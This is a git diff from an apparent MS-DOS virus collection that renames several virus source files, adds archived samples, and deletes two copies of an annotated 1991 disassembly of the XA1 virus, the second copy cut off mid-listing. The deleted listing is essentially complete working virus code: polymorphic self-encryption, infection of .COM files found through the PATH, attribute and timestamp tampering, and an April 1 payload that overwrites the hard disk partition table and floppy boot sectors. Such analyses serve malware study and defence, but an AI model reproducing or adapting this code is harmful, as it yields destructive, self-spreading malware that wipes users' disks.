diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xph_1100.asm b/MSDOS/Virus.MSDOS.RiotsAgainstTechnology.asm similarity index 100% rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xph_1100.asm rename to MSDOS/Virus.MSDOS.RiotsAgainstTechnology.asm diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.y_yank1.asm b/MSDOS/Virus.MSDOS.VladimirBotchev.asm similarity index 100% rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.y_yank1.asm rename to MSDOS/Virus.MSDOS.VladimirBotchev.asm diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xmas.pas b/MSDOS/Virus.MSDOS.X-MAS.pas similarity index 100% rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xmas.pas rename to MSDOS/Virus.MSDOS.X-MAS.pas diff --git a/MSDOS/Virus.MSDOS.XA1.7z b/MSDOS/Virus.MSDOS.XA1.7z new file mode 100644 index 00000000..53b30171 Binary files /dev/null and b/MSDOS/Virus.MSDOS.XA1.7z differ diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xhiltar.asm b/MSDOS/Virus.MSDOS.Xhiltar.asm similarity index 100% rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xhiltar.asm rename to MSDOS/Virus.MSDOS.Xhiltar.asm diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale_asm.asm b/MSDOS/Virus.MSDOS.Yale.asm similarity index 100% rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yale_asm.asm rename to MSDOS/Virus.MSDOS.Yale.asm diff --git a/MSDOS/Virus.MSDOS.YankeeDoodle.7z b/MSDOS/Virus.MSDOS.YankeeDoodle.7z new file mode 100644 index 00000000..fd1d0d4b Binary files /dev/null and b/MSDOS/Virus.MSDOS.YankeeDoodle.7z differ diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yeah1.asm b/MSDOS/Virus.MSDOS.Yeah.asm similarity index 100% rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yeah1.asm rename to MSDOS/Virus.MSDOS.Yeah.asm diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yelet.asm b/MSDOS/Virus.MSDOS.Yelet.j.asm similarity index 100% rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yelet.asm rename to MSDOS/Virus.MSDOS.Yelet.j.asm diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.you_got_it.asm b/MSDOS/Virus.MSDOS.YouGotIt.asm similarity index 100% rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.you_got_it.asm rename to MSDOS/Virus.MSDOS.YouGotIt.asm diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm b/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm deleted file mode 100644 index e3d62287..00000000 --- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm +++ /dev/null @@ -1,909 +0,0 @@ -;============================================== -; Virus XA1 isolated in Poland in June 1991 -; -; disassembled by Andrzej Kadlof July 1991 -; -; (C) Polish Section of Virus Information Bank -;============================================== - -; virus entry point - -0100 EB07 jmp 0109 - -0102 56 0A 03 59 00 ; first 7 bytes forms virus signature -0107 2A 00 ; generation counter, never used (?) - -; prepare stack for tricks -; stack usage: -; [BP + 2] cleared but not used -; [BP + 0] offset in block -; [BP - 2] low byte of size of decrypted part and encryption key - -0109 0E push cs ; make free space on stack -010A E80000 call 010D ; put current offset on the stack -010D FA cli ; disable interrupt to safe stack -010E 8BEC mov bp,sp -0110 58 pop ax -0111 32C0 xor al,al -0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? -0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt - -; encrypt virus code, this routine is changed in different virus copies - -011B B9CE05 mov cx,05CE ; length of decrypted block -011E B08C mov al,8C ; 8C is changed! -0120 8846FF mov [bp-01],al -0123 8B5E00 mov bx,[bp] ; current position in block -; ^^ changed, possible 3 wariants: -; ..5E.. mov bx,[bp] versions 0, 1, 2 -; ..76.. mov si,[bp] versions 3, 4, 5 -; ..7E.. mov di,[bp] versions 6, 7, 8 - -0126 884EFE mov [bp-02],cl ; low byte of counter -0129 8A4EFF mov cl,[bp-01] ; encrypt key -012C D207 rol byte ptr [bx],cl ; byte manipulation -; ^^^^ changed, possible 9 wariants: -; 000F add byte ptr [bx],cl version 0 -; 300F xor byte ptr [bx],cl version 1 -; D2O7 rol byte ptr [bx],cl version 2 -; 000C add byte ptr [si],cl version 3 -; 300C xor byte ptr [si],cl version 4 -; D204 rol byte ptr [si],cl version 5 -; 000D add byte ptr [di],cl version 6 -; 300D xor byte ptr [di],cl version 7 -; D205 rol byte ptr [di],cl version 8 - -012E EB00 jmp 0130 ; short pause -0130 43 inc bx ; position in block -; ^^ changed, possible 3 wariants: -; 43 inc bx version 0, 1, 2 -; 46 inc si version 3, 4, 5 -; 47 inc di version 6, 7, 8 - -0131 8A4EFE mov cl,[bp-02] ; restore block size -0134 E2F0 loop 0126 ; offset is decrypted! - -; encrypted part - -0136 FB sti - -; get address of curent DTA and store it on the stack - -0137 B42F mov ah,2F -0139 CD21 int 21 -013B 06 push es -013C 53 push bx - -; get keyboard status bits - -013D 33C0 xor ax,ax -013F 8ED8 mov ds,ax -0141 A01704 mov al,[0417] -0144 2410 and al,10 ; extract scroll lock state -0146 50 push ax ; store -0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag - -; restore DS - -014C 8CC8 mov ax,cs -014E 8ED8 mov ds,ax - -; intercepte INT 24h - -0150 BAC606 mov dx,06C6 -0153 B82425 mov ax,2524 ; set interrupt vector -0156 CD21 int 21 - -; search for PATH= in environment block - -0158 A12C00 mov ax,[002C] ; segment of environment block -015B 8EC0 mov es,ax -015D 33FF xor di,di ; begin of environment block -015F FC cld - -0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker -0164 741D je 0183 ; end fo block - -0166 BE1B05 mov si,051B ; offset of string 'PATH=' -0169 B90500 mov cx,0005 ; length of string -016C 8BC7 mov ax,di ; starting address -016E F3A6 rep cmpsb ; compare -0170 7411 je 0183 ; found - -0172 8BF8 mov di,ax ; last starting point -0174 32C0 xor al,al -0176 B5FF mov ch,FF ; maximum block size -0178 F2AE repnz scasb -017A 74E4 je 0160 - -017C BF1A05 mov di,051A ; end of buffer for path -017F 8CC8 mov ax,cs ; restore ES -0181 8EC0 mov es,ax -0183 C706C1056205 mov word ptr [05C1],0562 - -; set local DTA - -0189 BA3605 mov dx,0536 -018C B41A mov ah,1A ; set DTA -018E CD21 int 21 - -0190 A1F906 mov ax,[06F9] -0193 A3F706 mov [06F7],ax -0196 A1FD06 mov ax,[06FD] -0199 A3FB06 mov [06FB],ax -019C B90500 mov cx,0005 ; counter of potential victims -019F BA1505 mov dx,0515 ; '*.COM', 0 -01A2 06 push es -01A3 57 push di -01A4 51 push cx - -01A5 8CC8 mov ax,cs -01A7 8EC0 mov es,ax -01A9 B9FFFF mov cx,FFFF ; all possible attributes -01AC B44E mov ah,4E ; find first -01AE EB06 jmp 01B6 - -01B0 59 pop cx ; restore counter -01B1 E35B jcxz 020E ; limit reached, check show/destruction - -01B3 B44F mov ah,4F ; find next -01B5 51 push cx ; store counter - -01B6 CD21 int 21 -01B8 7203 jb 01BD ; continue - -01BA E9F100 jmp 02AE - -; restore address of path in environment block - -01BD 59 pop cx -01BE 5F pop di -01BF 07 pop es - -01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? -01C4 744A je 0210 ; yes - -; copy path to buffer - -01C6 BB6205 mov bx,0562 ; offset of buffer - -01C9 268A05 mov al,es:[di] ; next character -01CC 0AC0 or al,al ; end of block? -01CE 740A je 01DA ; yes - -01D0 47 inc di -01D1 3C3B cmp al,3B ; ';', end of path? -01D3 7405 je 01DA ; yes - -01D5 8807 mov [bx],al ; copy character -01D7 43 inc bx ; increase pointer -01D8 EBEF jmp 01C9 ; get next character - -01DA 81FB6205 cmp bx,0562 ; buffer not empty? -01DE 74E0 je 01C0 ; empty - -01E0 8A47FF mov al,[bx-01] -01E3 3C3A cmp al,3A ; ':', root directory -01E5 7408 je 01EF ; yes - -01E7 3C5C cmp al,5C ; check last character, '\' -01E9 7404 je 01EF ; there is - -01EB C6075C mov byte ptr [bx],5C ; add '\' -01EE 43 inc bx ; pointer to last character -01EF 06 push es -01F0 57 push di -01F1 51 push cx -01F2 891EC105 mov [05C1],bx ; store it -01F6 8BF3 mov si,bx -01F8 81EB6205 sub bx,0562 ; find path length -01FC 8BCB mov cx,bx -01FE BF1405 mov di,0514 ; destination buffer -0201 8CC8 mov ax,cs ; restore ES -0203 8EC0 mov es,ax -0205 4E dec si -0206 FD std -0207 F3A4 rep movsb ; copy -0209 8BD7 mov dx,di -020B 42 inc dx -020C EB97 jmp 01A5 ; find first - -; end of infection proces, check condition for destruction/show - -020E 58 pop ax ; balance stack -020F 58 pop ax - -0210 8CC8 mov ax,cs ; restore ES -0212 8EC0 mov es,ax - -; get date - -0214 B42A mov ah,2A ; get date -0216 CD21 int 21 - -0218 81FA0104 cmp dx,0401 ; April 1? -021C 7533 jne 0251 ; no - -;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> -; -; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: -; -;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> - -; copy partition table to sector 11h of side 0, track 0 - -021E BA8000 mov dx,0080 ; first hard drive -0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) -0224 BB0307 mov bx,0703 ; destroy victim code -0227 B80102 mov ax,0201 ; read 1 sector -022A 52 push dx -022B 51 push cx -022C 53 push bx -022D CD13 int 13 ; disk I/O -022F 5B pop bx -0230 59 pop cx -0231 5A pop dx -0232 B111 mov cl,11 ; new place for partition table -0234 B80103 mov ax,0301 ; write partition table -0237 CD13 int 13 - -; set and of sector marker in the buffer - -0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker - -; overwrite partition table - -023F B280 mov dl,80 -0241 E87404 call 06B8 ; write one sector to disk - -; overwrite boot sector of drive A: - -0244 32D2 xor dl,dl -0246 E86F04 call 06B8 ; write one sector do disk - -; overwrite boot sector of drive B: - -0249 B201 mov dl,01 -024B E86A04 call 06B8 ; write disk - -024E EB0A jmp 025A -0250 90 nop - -; compare date - -0251 81FA180C cmp dx,0C18 ; december 24? -0255 7203 jb 025A ; date earlier - -;<><><><<><><><><><><><><><><><><><><><> -; -; CHRISTMAS SHOW -; -; see the description of subroutine 05D7 -;<><><><><><><><><><><><><><><><><><><><><> - -0257 E87D03 call 05D7 ; drow christmas tree - -; make sound - -025A E440 in al,40 -025C 3CF8 cmp al,F8 -025E 7206 jb 0266 - -0260 E461 in al,61 -0262 0C03 or al,03 -0264 E661 out 61,al - -; restore the state of scroll lock flag - -0266 33C0 xor ax,ax -0268 8ED8 mov ds,ax -026A 58 pop ax -026B 08061704 or [0417],al - -; restore INT 24h - -026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP -0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP -0279 B82425 mov ax,2524 ; set interrupt vector -027C CD21 int 21 - -; restore DTA - -027E 5A pop dx -027F 1F pop ds -0280 B41A mov ah,1A ; set DTA -0282 CD21 int 21 - -; restore DS - -0284 8CC8 mov ax,cs -0286 8ED8 mov ds,ax - -0288 BEF006 mov si,06F0 -028B 8B3EF706 mov di,[06F7] -028F 033EFB06 add di,[06FB] -0293 57 push di -0294 B90700 mov cx,0007 -0297 FC cld -0298 F3A4 rep movsb -029A 33C0 xor ax,ax -029C 8BD8 mov bx,ax -029E 8BD0 mov dx,ax -02A0 8BE8 mov bp,ax - -02A2 8B36F706 mov si,[06F7] -02A6 BF0001 mov di,0100 -02A9 8B0EFB06 mov cx,[06FB] -02AD C3 ret - -02AE BE5405 mov si,0554 ; file name in FCB -02B1 8B3EC105 mov di,[05C1] ; address of destination -02B5 B90D00 mov cx,000D ; length of asciiz string -02B8 FC cld -02B9 F3A4 rep movsb ; copy -02BB BF2005 mov di,0520 ; buffer for file name -02BE E8FA01 call 04BB ; copy -02C1 7503 jne 02C6 - -02C3 E9EAFE jmp 01B0 ; find next/destruct/show - -02C6 BF2B05 mov di,052B -02C9 E8EF01 call 04BB ; copy file name -02CC 7503 jne 02D1 - -02CE E9DFFE jmp 01B0 ; find next/destruct/show - -02D1 C606610500 mov byte ptr [0561],00 -02D6 90 nop -02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA -02DC 740F je 02ED ; hiden, system or read only, open file - -02DE BA6205 mov dx,0562 ; file name -02E1 33C9 xor cx,cx ; clear all attributes -02E3 B80143 mov ax,4301 ; set file attributes -02E6 CD21 int 21 -02E8 7303 jnb 02ED ; open file - -02EA E9C3FE jmp 01B0 ; find next/destruct/show - -02ED BA6205 mov dx,0562 -02F0 B8023D mov ax,3D02 ; open file for read/write -02F3 CD21 int 21 - -02F5 8BD8 mov bx,ax ; handle -02F7 7303 jnb 02FC - -02F9 E9B4FE jmp 01B0 ; find next - -; check file size - -02FC A15205 mov ax,[0552] ; high word of file size in DTA -02FF 0BC0 or ax,ax -0301 7403 je 0306 ; file below 64K - -0303 E99001 jmp 0496 ; close file and find next - -0306 A15005 mov ax,[0550] ; lower word of file size -0309 3D0700 cmp ax,0007 ; minimum file size -030C 72F5 jb 0303 ; close file and find next - -030E 3D00F8 cmp ax,F800 ; maximum file size -0311 73F0 jnb 0303 ; close file and find next - -; mayby already infected? - -0313 8B16F706 mov dx,[06F7] ; form address of bufer -0317 0316FB06 add dx,[06FB] -031B B90700 mov cx,0007 ; number of bytes -031E 52 push dx -031F 51 push cx -0320 B43F mov ah,3F ; read file -0322 CD21 int 21 - -0324 59 pop cx -0325 5E pop si -0326 7208 jb 0330 ; read error, close and find next - -; compare first 7 bytes with own code - -0328 BF0001 mov di,0100 ; destination -032B FC cld -032C F3A6 rep cmpsb -032E 7503 jne 0333 - -0330 E96301 jmp 0496 ; close file and find next, (infected!) - -; get and store file date and time - -0333 B80057 mov ax,5700 ; get file time stamp -0336 CD21 int 21 -0338 72F6 jb 0330 ; close file, find next - -033A 89160107 mov [0701],dx ; store date -033E 890EFF06 mov [06FF],cx ; store time -0342 C606610501 mov byte ptr [0561],01 -0347 90 nop - -; check file size, if less than 603h bytes then append some garbage - -0348 A15005 mov ax,[0550] ; file size -034B 3D0306 cmp ax,0603 -034E 7321 jnb 0371 - -; file length is less than 603h, add some garbage - -0350 33D2 xor dx,dx -0352 33C9 xor cx,cx -0354 B80242 mov ax,4202 ; move file ptr to EOF -0357 CD21 int 21 -0359 7303 jnb 035E ; no errors, continue - -035B E93801 jmp 0496 ; close file and find next - -035E B90306 mov cx,0603 ; number of bytes -0361 2B0E5005 sub cx,[0550] ; file size -0365 B440 mov ah,40 ; write file -0367 CD21 int 21 -0369 B80306 mov ax,0603 ; new file size -036C 7303 jnb 0371 - -036E E92501 jmp 0496 ; close file and find next - -; now file is at least 603h bytes long - -0371 FEC4 inc ah -0373 A3F906 mov [06F9],ax ; oryginal file size + 256 -0376 A15005 mov ax,[0550] ; file size -0379 BE0306 mov si,0603 ; virus length -037C 33FF xor di,di -037E 3BC6 cmp ax,si -0380 7302 jnb 0384 - -0382 8BF0 mov si,ax - -0384 8936FD06 mov [06FD],si - -0388 8BD7 mov dx,di -038A 33C9 xor cx,cx -038C B80042 mov ax,4200 ; move file ptr to BOF -038F CD21 int 21 -0391 7303 jnb 0396 - -0393 E90001 jmp 0496 ; close file and find next - -0396 8B16F706 mov dx,[06F7] -039A 0316FB06 add dx,[06FB] -039E B90002 mov cx,0200 -03A1 3BF1 cmp si,cx -03A3 7302 jnb 03A7 - -03A5 8BCE mov cx,si ; number of bytes - -03A7 52 push dx -03A8 51 push cx -03A9 B43F mov ah,3F ; read file -03AB CD21 int 21 -03AD 59 pop cx -03AE 5A pop dx -03AF 7303 jnb 03B4 ; continue - -03B1 E9E200 jmp 0496 ; close file and find next - -03B4 52 push dx -03B5 51 push cx -03B6 33D2 xor dx,dx -03B8 33C9 xor cx,cx -03BA B80242 mov ax,4202 ; move file ptr to EOF -03BD CD21 int 21 -03BF 59 pop cx -03C0 5A pop dx -03C1 7303 jnb 03C6 ; continue - -03C3 E9D000 jmp 0496 ; close file and find next - -03C6 B440 mov ah,40 ; write file -03C8 CD21 int 21 -03CA 7303 jnb 03CF - -03CC E9C700 jmp 0496 ; close file and find next - -03CF 81C70002 add di,0200 -03D3 81EE0002 sub si,0200 -03D7 7602 jbe 03DB - -03D9 EBAD jmp 0388 - -03DB FF060701 inc word ptr [0107] ; infection counter -03DF 33D2 xor dx,dx -03E1 33C9 xor cx,cx -03E3 B80042 mov ax,4200 ; move file ptr to BOF -03E6 CD21 int 21 -03E8 7303 jnb 03ED - -03EA E9A900 jmp 0496 ; close file and find next - -03ED 53 push bx ; store handle -03EE E440 in al,40 -03F0 A807 test al,07 -03F2 74FA je 03EE - -03F4 A21F01 mov [011F],al ; change decryption key - -; get random number from system timer count - -03F7 33C0 xor ax,ax -03F9 8AF8 mov bh,al -03FB 8ED8 mov ds,ax -03FD A06C04 mov al,[046C] ; timer, low byte - -0400 8CCA mov dx,cs ; restore DS -0402 8EDA mov ds,dx - -; generate rundom number in BX in the range 0..8 - -0404 B103 mov cl,03 -0406 F6F1 div cl ; AL <- AL/3, AH <- remainder -0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) -040A 32E4 xor ah,ah ; prepare division -040C F6F1 div cl ; AL <- AL / 9, AH <- remainder -040E 8AC4 mov al,ah ; AL <- second remainder -0410 02C0 add al,al ; *2, AL in [0..4] -0412 02C4 add al,ah ; *3, AL in [0..6] -0414 02C5 add al,ch ; first remainder -0416 8AD8 mov bl,al ; BL in [0..8] - -; multiply BX by 4 (table entry size) - -0418 03DB add bx,bx -041A 03DB add bx,bx -041C 81C3C906 add bx,06C9 ; offset of table - -; modify encryption routine (automodyfication) - -0420 8A07 mov al,[bx] -0422 A22401 mov [0124],al ; 3 versions 5E/76/7E -0425 8B4701 mov ax,[bx+01] -0428 A32C01 mov [012C],ax ; 9 wersions -042B 8A4703 mov al,[bx+03] ; 3 versions -042E A23001 mov [0130],al -0431 8AC5 mov al,ch - -; prepare decrypt routine - -0433 BBED06 mov bx,06ED -0436 D7 xlat -0437 A26104 mov [0461],al ; modify decryption routine - -; write new encryption routine to file - -043A 5B pop bx ; restore handle -043B BA0001 mov dx,0100 ; begin of file -043E B93500 mov cx,0035 ; block size -0441 B440 mov ah,40 ; write file -0443 CD21 int 21 -0445 724F jb 0496 ; close file and find next - -; decryption routine - -0447 BE3501 mov si,0135 ; start of decrypted block -044A B9CE05 mov cx,05CE ; size of decrypted block -044D 53 push bx ; store handle -044E 51 push cx -044F B80002 mov ax,0200 -0452 8B1EF706 mov bx,[06F7] -0456 031EFB06 add bx,[06FB] -045A 53 push bx -045B 8A0E1F01 mov cl,[011F] ; decription key - -045F 8A2C mov ch,[si] -0461 D2CD ror ch,cl ; <-- changed (3 variants) - -; ^^ changed byte, possible wariants: -; 28CD sub ch,cl versions: 0, 3, 6 -; 30CD xor ch,cl versions: 1, 4, 7 -; D2CD ror ch,cl versions: 2, 5, 8 - -0463 882F mov [bx],ch -0465 43 inc bx -0466 46 inc si -0467 48 dec ax -0468 75F5 jne 045F - -046A 5A pop dx -046B 59 pop cx -046C 5B pop bx -046D 51 push cx -046E 81F90102 cmp cx,0201 -0472 7203 jb 0477 - -0474 B90002 mov cx,0200 -0477 B440 mov ah,40 ; write file -0479 CD21 int 21 -047B 59 pop cx -047C 7218 jb 0496 ; close file and find next - -047E 81E90002 sub cx,0200 -0482 77C9 ja 044D - -; restore file time stamp - -0484 8B160107 mov dx,[0701] ; file date -0488 8B0EFF06 mov cx,[06FF] ; file time -048C B80157 mov ax,5701 ; set file time stamp -048F CD21 int 21 -0491 7203 jb 0496 ; close file and find next - -; decrease counter on the stack - -0493 59 pop cx -0494 49 dec cx -0495 51 push cx - -0496 B43E mov ah,3E ; close file -0498 CD21 int 21 -049A 8A0E4B05 mov cl,[054B] ; attributes -049E FE0E6105 dec byte ptr [0561] -04A2 7405 je 04A9 - -04A4 F6C107 test cl,07 ; hidden, system, read only -04A7 740F je 04B8 - -04A9 80F920 cmp cl,20 ; archive -04AC 740A je 04B8 - -04AE BA6205 mov dx,0562 ; file name -04B1 32ED xor ch,ch -04B3 B80143 mov ax,4301 ; set file attributes -04B6 CD21 int 21 -04B8 E9F5FC jmp 01B0 ; find next - -;---------------------------------------- -; move 11 bytes do DS:DI ('C:\COMMAND.') - -04BB BE6205 mov si,0562 -04BE B90B00 mov cx,000B -04C1 FC cld -04C2 F3A6 rep cmpsb -04C4 C3 ret - -; buffer for path - -04C5 30 31 32 33 34 35 36 37 01234567 -04CD 38 39 30 31 32 33 34 35 89012345 -04D5 36 37 38 39 30 31 32 33 67890123 -04DD 34 35 36 37 38 39 30 31 45678901 -04E5 32 33 34 35 36 37 38 39 23456789 -04ED 30 31 32 33 34 35 36 37 01234567 -04F5 38 39 30 31 32 33 34 35 89012345 -04FD 36 37 38 43 3A 5C 4A 45 678C:\JE -0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P -050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ - -; paterns for search - -0515 2A 2E 43 4F 4D 00 50 41 *.COM PA -051D 54 48 3D TH= - -; buffers for file names - -0520 49 42 4D 42 49 IBMBI -0525 4F 2E 43 4F 4D 00 O.COM - -052B 49 42 IB -052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM -0535 00 - -; local DTA - -0536 03 3F 3F 3F 3F 3F 3F ;\ -053D 3F 3F 43 4F 4D FF 02 00 ; | reserved -0545 00 00 00 00 00 00 ;/ -054B 20 ; file attribute -054C 00 60 71 0E ; file time stamp -0550 DB 62 00 00 ; file size -0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) - -0561 01 ; flag: attributes are changed - -0562 43 3A 5C C:\ -0565 43 4F 4D 4D 41 4E 44 2E COMMAND. -056D 43 4F 4D 00 00 4D 00 00 COM M -0575 00 2E 43 4F 4D 00 4F 68 .COM Oh -057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo -059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh -05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -05BD 68 4E 6F 21 hNo! - -05C1 65 05 ; - -;--------------------------------------- -; write character (or space) cx times - -05C3 B020 mov al,20 - -05C5 50 push ax -05C6 E89E00 call 0667 ; write character -05C9 58 pop ax -05CA E2F9 loop 05C5 -05CC C3 ret - -;------------- -; next line - -05CD B00D mov al,0D -05CF E89500 call 0667 ; write character -05D2 B00A mov al,0A -05D4 E99000 jmp 0667 ; write character - -;------------------------------ -; drow christmast tree -; -; result will look like this: -; -; -; ­ -; *** -; ***** -; ******* -; ********* -; *********** -; ************* -; *************** -; ***************** -; ******************* -; ********************* -; *********************** -; ************************* -; *************************** -; ***************************** -; ÛÛÛ -; ÛÛÛ -; ÛÛÛ -;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ -; Und er lebt doch noch : Der Tannenbaum ! -; Frohe Weihnachten ... -; - -05D7 B92700 mov cx,0027 -05DA E8E6FF call 05C3 ; clear 39 characters -05DD B0AD mov al,AD ; '­' -05DF E88500 call 0667 ; write character -05E2 E8E8FF call 05CD ; new line -05E5 BB0300 mov bx,0003 -05E8 BA2600 mov dx,0026 - -05EB 8BCA mov cx,dx -05ED E8D3FF call 05C3 ; write CX spaces -05F0 8BCB mov cx,bx -05F2 B02A mov al,2A ; '*' -05F4 E8CEFF call 05C5 ; write CX characters -05F7 E8D3FF call 05CD ; new line -05FA 4A dec dx -05FB 83C302 add bx,0002 -05FE 83FB1F cmp bx,001F -0601 75E8 jne 05EB - -0603 BB0300 mov bx,0003 -0606 B92600 mov cx,0026 -0609 E8B7FF call 05C3 ; write CX spaces -060C B90300 mov cx,0003 -060F B0DB mov al,DB ; 'Û' -0611 E8B1FF call 05C5 ; write CX characters -0614 E8B6FF call 05CD ; next line -0617 4B dec bx -0618 75EC jne 0606 - -061A B95000 mov cx,0050 ; full line -061D B0CD mov al,CD ; 'Í' -061F E8A3FF call 05C5 ; write character CX times -0622 B91300 mov cx,0013 -0625 E89BFF call 05C3 ; write CX spaces -0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... -062B E82C00 call 065A ; write string -062E B91D00 mov cx,001D -0631 E88FFF call 05C3 ; clear part of line -0634 EB24 jmp 065A ; write asciiz string pointed by BX -0636 90 nop - -0637 E80000 call 063A - -063A 5B pop bx -063B 83C30D add bx,000D -063E 8CC8 mov ax,cs -0640 8ED8 mov ds,ax -0642 E81500 call 065A ; write string -0645 EBFE jmp 0645 ; hang CPU - -0647 41 70 72 69 6C 2C 20 41 April, A -064F 70 72 69 6C 20 2E 2E 2E pril ... -0657 20 07 00 - -;----------------------------------- -; write asciiz string pointed by BX - -065A 8A07 mov al,[bx] ; get character -065C 43 inc bx ; next character -065D 0AC0 or al,al ; and of string? -065F 7405 je 0666 ; yes, RET - -0661 E80300 call 0667 ; write character -0664 EBF4 jmp 065A ; get next character -0666 C3 ret - -;-------------------- -; write character TTL - -0667 52 push dx -0668 51 push cx -0669 53 push bx -066A 32FF xor bh,bh -066C B40E mov ah,0E -066E CD10 int 10 -0670 5B pop bx -0671 59 pop cx -0671 59 pop cx -0672 5A pop dx -0673 C3 ret - -0674 55 6E 64 20 65 72 20 6C Und er l -067C 65 62 74 20 64 6F 63 68 ebt doch -0684 20 6E 6F 63 68 20 3A 20 noch : -068C 44 65 72 20 54 61 6E 6E Der Tann -0694 65 6E 62 61 75 6D 20 21 enbaum ! -069C 0D 0A 00 46 72 6F 68 65 Frohe -06A4 20 57 65 69 68 6E 61 63 Weihnac -06AC 68 74 65 6E 20 2E 2E 2E hten ... -06B4 0D 0A 07 00 - -;------------------------------------------ -; write one sector to disk specified in DL -; track 9, side 0 sector 1 - -06B8 32F6 xor dh,dh -06BA B90100 mov cx,0001 -06BD BB3706 mov bx,0637 -06C0 B80103 mov ax,0301 -06C3 CD13 int 13 -06C5 C3 ret - -;================== -; INT 24h handler - -06C6 B000 mov al,00 -06C8 CF iret - -; table of bytes for changing encrypt routine - -06C9 5E 00 0F 43 -06CD 5E 30 0F 43 -06D1 5E D2 07 43 -06D5 76 00 0C 46 -06D9 76 30 0C 46 -06DD 76 D2 04 46 -06E1 7E 00 0D 47 -06E5 7E 30 0D 47 -06E9 7E D2 05 47 - -; table for variants of decrypt routine - -06ED 28 30 D2 - -; part of victime code - -06F0 F3A4 rep movsb -06F2 8BF1 mov si,cx -06F4 8BF9 mov di,cx -06F6 C3 ret - -06F7 0307 ; offset of buffer/modified code -06F9 DB63 ; file size + 256 -06FB C603 ; -06FD 0306 ; -06FF 0060 ; file date -0701 710E ; file time - diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst b/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst deleted file mode 100644 index e3d62287..00000000 --- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst +++ /dev/null @@ -1,909 +0,0 @@ -;============================================== -; Virus XA1 isolated in Poland in June 1991 -; -; disassembled by Andrzej Kadlof July 1991 -; -; (C) Polish Section of Virus Information Bank -;============================================== - -; virus entry point - -0100 EB07 jmp 0109 - -0102 56 0A 03 59 00 ; first 7 bytes forms virus signature -0107 2A 00 ; generation counter, never used (?) - -; prepare stack for tricks -; stack usage: -; [BP + 2] cleared but not used -; [BP + 0] offset in block -; [BP - 2] low byte of size of decrypted part and encryption key - -0109 0E push cs ; make free space on stack -010A E80000 call 010D ; put current offset on the stack -010D FA cli ; disable interrupt to safe stack -010E 8BEC mov bp,sp -0110 58 pop ax -0111 32C0 xor al,al -0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? -0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt - -; encrypt virus code, this routine is changed in different virus copies - -011B B9CE05 mov cx,05CE ; length of decrypted block -011E B08C mov al,8C ; 8C is changed! -0120 8846FF mov [bp-01],al -0123 8B5E00 mov bx,[bp] ; current position in block -; ^^ changed, possible 3 wariants: -; ..5E.. mov bx,[bp] versions 0, 1, 2 -; ..76.. mov si,[bp] versions 3, 4, 5 -; ..7E.. mov di,[bp] versions 6, 7, 8 - -0126 884EFE mov [bp-02],cl ; low byte of counter -0129 8A4EFF mov cl,[bp-01] ; encrypt key -012C D207 rol byte ptr [bx],cl ; byte manipulation -; ^^^^ changed, possible 9 wariants: -; 000F add byte ptr [bx],cl version 0 -; 300F xor byte ptr [bx],cl version 1 -; D2O7 rol byte ptr [bx],cl version 2 -; 000C add byte ptr [si],cl version 3 -; 300C xor byte ptr [si],cl version 4 -; D204 rol byte ptr [si],cl version 5 -; 000D add byte ptr [di],cl version 6 -; 300D xor byte ptr [di],cl version 7 -; D205 rol byte ptr [di],cl version 8 - -012E EB00 jmp 0130 ; short pause -0130 43 inc bx ; position in block -; ^^ changed, possible 3 wariants: -; 43 inc bx version 